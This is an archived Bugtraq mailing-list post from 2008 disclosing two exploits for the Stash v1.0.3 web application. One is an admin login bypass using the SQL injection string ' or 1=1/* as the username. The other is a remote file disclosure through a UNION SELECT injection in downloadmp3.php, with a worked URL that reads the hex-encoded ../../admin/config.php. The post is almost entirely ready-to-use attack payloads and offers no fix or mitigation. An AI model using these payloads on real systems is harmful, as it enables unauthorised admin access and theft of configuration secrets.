Stash v1.0.3 Admin bypass / Remote File Disclosure

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Stash v1.0.3 Admin bypass / Remote File Disclosure
From: r3d.w0rm@xxxxxxxxx
Date: Tue, 9 Sep 2008 00:41:38 -0600
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#####################################################################################
####           Stash v1.0.3 Admin bypass / Remote File Disclosure               
 ####
#####################################################################################
#                                                                               
    #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                  
    #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                           
    #
#Our Site : Http://IRCRASH.COM                                                  
    #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                   
    #
#####################################################################################
#                                                                               
    #
#Download : 
http://kent.dl.sourceforge.net/sourceforge/nice-stash/stash-1.0.3.tar.gz#
#                                                                               
    #
#DORK : :(                                                                      
    #
#                                                                               
    #
#####################################################################################
#                                [Admin by pass]                                
    #
#                                                                               
    #
#http://Site/[path]/admin/login                                                 
    #
#Username : ' or 1=1/*                                                          
    #
#Password : R3d.W0rm                                                            
    #
#                                                                               
    #
#####################################################################################
#                            [Remote File Disclosure]                           
    #
#                                                                               
    #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x[file
 name in hex])/* 
#                                                                               
    #
#Note : You must enter file name in hex in valun address to download it .       
    #
#Ex. ../../admin/config.php == 2E2E2F2E2E2F61646D696E2F636F6E6669672E706870     
    #
#http://Site/[path]/downloadmp3.php?download=-99999'+union+select+0,1,2,3,4,concat(0x2E2E2F2E2E2F61646D696E2F636F6E6669672E706870)/*
 
#                                                                               
    #
#####################################################################################
#                           Site : Http://IRCRASH.COM                           
    #
###################################### TNX GOD 
######################################

Prev by Date: [USN-641-1] Racoon vulnerabilities
Next by Date: Sun M-class hardware denial of service
Previous by thread: [USN-641-1] Racoon vulnerabilities
Next by thread: Sun M-class hardware denial of service
Index(es):
- Date
- Thread